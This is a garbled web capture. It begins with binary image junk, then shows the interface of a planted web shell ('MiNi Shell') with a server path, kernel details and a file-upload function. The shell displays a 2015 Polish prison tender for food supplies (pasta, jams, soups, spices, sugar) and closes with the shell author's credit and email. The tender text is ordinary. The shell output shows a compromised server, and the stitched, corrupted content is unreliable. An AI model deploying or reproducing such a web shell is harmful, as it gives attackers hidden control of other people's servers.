JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150205/26164-N-2015.html

<p class="kh_header"><b>Nowogród Bobrzański: Nr spr. 1/DKW/Ż/15 Dostwa różnych artykułów spożywczych dla jednostek organizacyjnych Służby Więziennej Okręgu Poznańskiego.</b><br>
<b>Numer ogłoszenia: 26164 - 2015; data zamieszczenia: 05.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Krzywańcu , Krzywaniec, 66-010 Nowogród Bobrzański, woj. lubuskie, tel. 68 3279405, faks 68 3276640.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna Więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nr spr. 1/DKW/Ż/15 Dostwa różnych artykułów spożywczych dla jednostek organizacyjnych Służby Więziennej Okręgu Poznańskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów przemiału ziarna, przetworów owocowo - warzywnych, dżemów, sosów, zup, przypraw oraz innych artykułów spożywczych dla jednostek organizacyjnych Służby Więziennej Okręgu Poznańskiego (Zakład Karny w Krzywańcu, Areszt Śledczy w Zielonej Górze, Areszt Śledczy w Lubsku, Areszt Śledczy w Nowej Soli) w n/w ilościach:
ZADANIE NR 1 - PRODUKTY PRZEMIAŁU ZIARNA: makaron 13000 kg, granulat sojowy 450 kg, kostka sojowa 810 kg, kotlet sojowy a la schabowy 1250 kg, mąka pszenna 6620 kg, mąka ziemniaczana 380 kg, kasza gryczana 1900 kg, kasza jęczmienna 5500 kg, ryż 6700 kg, kasza manna 1330 kg, makaron nitka rosołowa 1200 kg. ZADANIE NR 2 - PRZETWORY OWOCOWO - WARZYWNE: chrzan tarty 235 kg, koncentrat pomidorowy 3140 kg, leczo 3380 kg, ogórki konserwowe 3000 kg, sok przecierowy 300 szt., kukurydza konserwowa 120 kg, groszek konserwowy 360 kg, brzoskwinie w syropie 50 szt., ketchup łagodny 530 kg. ZADANIE NR 3 - DŻEMY: dżem brzoskwiniowy niskosłodzony 1700 kg, dżem truskawkowy niskosłodzony 2950 kg, marmolada wieloowocowa 5150 kg, konfitura z truskawek 20 kg, konfitura z brzoskwiń 20 kg, konfitura z wiśni 30 kg, powidła śliwkowe 20 kg. ZADANIE NR 4 - SOSY, ZUPY I PRZYPRAWY: zupa porowa 100 kg, zupa ziemniaczana 150 kg, zupa żurek 510 kg, zupa barszcz biały 250 kg, zupa barszcz czerwony 200 kg, zupa cebulowa 180 kg, zupa kalafiorowa 150 kg, zupa pomidorowa 150 kg, zupa grochowa 100 kg, zupa jarzynowa 150 kg, sos biały 150 kg, sos pieczeniowy 230 kg, sos myśliwski 230 kg, sos grzybowy 150 kg, sos pomidorowy 100 kg, sos neapolitański 300 kg, czosnek granulowany 95 kg, fix do gulaszu 150 kg, ziele angielskie 55 kg, liść laurowy 46 kg, majeranek 146 kg, papryka słodka mielona 174 kg, papryka ostra mielona 50 kg, pieprz czarny mielony 252 kg, sól 3260 kg, bazylia 10 kg, oregano 20 kg, koper suszony 85 kg, natka pietruszki suszona 80 kg, bulion drobiowy 2200 kg, przyprawa warzywna typu vegetta 990 kg, kwasek cytrynowy 74 kg, przyprawa w płynie typu maggi 2300 l, ocet 465 l, zupa grzybowa 110 kg. ZADANIE NR 5 - INNE ARTYKUŁY SPOŻYWCZE: herbata 1250 kg, majonez 332 kg, musztarda 540 kg, budyń 30 kg, galaretka 20 kg, kisiel 80 kg, proszek do pieczenia 50 szt., krem czekoladowy 20 kg, cukier waniliowy 30 szt., kakao rozpuszczalne 20 kg, paluszki słone 300 szt., wafelki 20 kg, ptasie mleczko 20 kg, cukierki czekoladowe 10 kg, biszkopty 20 kg, lizak 300 szt., kaszka ryżowa błyskawiczna 50 kg, kaszka mleczno - ryżowa 50 kg, ciastka maślane 30 kg, herbata owocowa 230 kg, płatki kukurydziane 50 kg, płatki kukurydziane w polewie czekoladowej 50 kg, syrop owocowy 580 l, bita śmietana 50 szt., sok 80 l, czekolada mleczna 10 kg, wafle ryżowe 30 kg, chrupki kukurydziane 300 szt., cukier 24100 kg, woda źródlana 7800 szt., kawa zbożowa 370 kg, herbata ekspresowa 240 kg..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2, 15.85.11.00-9, 15.80.00.00-6, 15.61.21.00-2, 15.33.10.00-7, 15.33.14.25-2, 15.33.14.00-1, 15.33.22.90-3, 15.33.22.00-6, 15.89.14.00-4, 15.87.00.00-7, 15.87.21.00-2, 15.87.24.00-5, 15.86.30.00-5, 15.87.12.50-1, 15.98.13.00-8, 15.86.12.00-3, 15.84.23.00-5, 15.61.33.11-1, 15.32.18.00-2, 15.87.12.73-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz ofertowy wraz z zawartymi oświadczeniami - załącznik nr 1 do SIWZ;
b) dokumenty potwierdzające uprawnienie osób podpisujących ofertę (np. oryginał pełnomocnictwa lub kopia notarialnie poświadczona), o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
c) w przypadku korzystania z podwykonawstwa - oświadczenie wykonawcy w którym zawarta będzie informacja nt. części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W przypadku ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy, strony dopuszczają możliwość zmiany stawek podatkowych określonych w umowie zgodnie z obowiązującymi przepisami.
2. Strony przewidują możliwość zmiany umowy w przypadku zmiany przepisów prawnych dotyczących bezpieczeństwa żywności i żywienia.
3. Każda zmiana postanowień niniejszej umowy wymaga pod rygorem nieważności zachowania formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Krzywańcu
66 - 010 Nowogród Bobrzański.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2015 godzina 12:30, miejsce: Zakład Karny w Krzywańcu, 66-010 Nowogród Bobrzański BIURO PODAWCZE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1 - PRODUKTY PRZEMIAŁU ZIARNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów przemiału ziarna dla jednostek organizacyjnych Służby Więziennej Okręgu Poznanskiego w n/w ilościach: makaron 13000 kg, granulat sojowy 450 kg, kostka sojowa 810 kg, kotlet sojowy a la schabowy 1250 kg, mąka pszenna 6620 kg, mąka ziemniaczana 380 kg, kasza gryczana 1900 kg, kasza jęczmienna 5500 kg, ryż 6700 kg, kasza manna 1330 kg, makaron nitka rosołowa 1200 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9, 15.80.00.00-6, 15.61.21.00-2, 15.60.00.00-4, 15.61.00.00-7, 15.61.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2  - PRZETWORY OWOCOWO - WARZYWNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa przetworów owocowo - warzywnych dla jednostek organizacyjnych Służby Więziennej Okręgu Poznańskiego w n/w ilościach: chrzan tarty 235 kg, koncentrat pomidorowy 3140 kg, leczo 3380 kg, ogórki konserwowe 3000 kg, sok przecierowy 300 szt., kukurydza konserwowa 120 kg, groszek konserwowy 360 kg, brzoskwinie w syropie 50 szt., ketchup łagodny 530 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.10.00-7, 15.33.14.25-2, 15.33.15.00-2, 15.98.21.00-6, 15.33.14.00-1, 15.33.24.00-8, 15.87.12.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3 - DŻEMY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dżemów dla jednostek organizacyjnych Służby Więziennej Okręgu Poznańskiego w n/w ilościach: żem brzoskwiniowy niskosłodzony 1700 kg, dżem truskawkowy niskosłodzony 2950 kg, marmolada wieloowocowa 5150 kg, konfitura z truskawek 20 kg, konfitura z brzoskwiń 20 kg, konfitura z wiśni 30 kg, powidła śliwkowe 20 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.90-3, 15.33.22.96-5, 15.33.22.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4 -SOSY, ZUPY I PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sosów, zup i przypraw dla jednostek organizacyjnych Służby Więziennej Okręgu Poznańskiego w n/w ilościach: zupa porowa 100 kg, zupa ziemniaczana 150 kg, zupa żurek 510 kg, zupa barszcz biały 250 kg, zupa barszcz czerwony 200 kg, zupa cebulowa 180 kg, zupa kalafiorowa 150 kg, zupa pomidorowa 150 kg, zupa grochowa 100 kg, zupa jarzynowa 150 kg, sos biały 150 kg, sos pieczeniowy 230 kg, sos myśliwski 230 kg, sos grzybowy 150 kg, sos pomidorowy 100 kg, sos neapolitański 300 kg, czosnek granulowany 95 kg, fix do gulaszu 150 kg, ziele angielskie 55 kg, liść laurowy 46 kg, majeranek 146 kg, papryka słodka mielona 174 kg, papryka ostra mielona 50 kg, pieprz czarny mielony 252 kg, sól 3260 kg, bazylia 10 kg, oregano 20 kg, koper suszony 85 kg, natka pietruszki suszona 80 kg, bulion drobiowy 2200 kg, przyprawa warzywna typu vegetta 990 kg, kwasek cytrynowy 74 kg, przyprawa w płynie typu maggi 2300 l, ocet 465 l, zupa grzybowa 110 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.14.00-4, 15.87.12.60-4, 15.87.00.00-7, 15.87.21.00-2, 15.87.24.00-5, 15.87.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR 5 - INNE ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa innych artykułów spożywczych dla jednostek organizacyjnych Służby Więziennej Okręgu Poznańskiego w n/w ilościach: herbata 1250 kg, majonez 332 kg, musztarda 540 kg, budyń 30 kg, galaretka 20 kg, kisiel 80 kg, proszek do pieczenia 50 szt., krem czekoladowy 20 kg, cukier waniliowy 30 szt., kakao rozpuszczalne 20 kg, paluszki słone 300 szt., wafelki 20 kg, ptasie mleczko 20 kg, cukierki czekoladowe 10 kg, biszkopty 20 kg, lizak 300 szt., kaszka ryżowa błyskawiczna 50 kg, kaszka mleczno - ryżowa 50 kg, ciastka maślane 30 kg, herbata owocowa 230 kg, płatki kukurydziane 50 kg, płatki kukurydziane w polewie czekoladowej 50 kg, syrop owocowy 580 l, bita śmietana 50 szt., sok 80 l, czekolada mleczna 10 kg, wafle ryżowe 30 kg, chrupki kukurydziane 300 szt., cukier 24100 kg, woda źródlana 7800 szt., kawa zbożowa 370 kg, herbata ekspresowa 240 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.30.00-5, 15.87.12.73-8, 15.87.12.50-1, 15.83.31.00-7, 15.80.00.00-6, 15.84.20.00-2, 15.84.10.00-5, 15.84.23.00-5, 15.84.22.20-0, 15.86.41.00-3, 15.61.33.11-1, 15.32.18.00-2, 15.32.10.00-4, 15.83.10.00-2, 15.98.13.00-8, 15.86.12.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com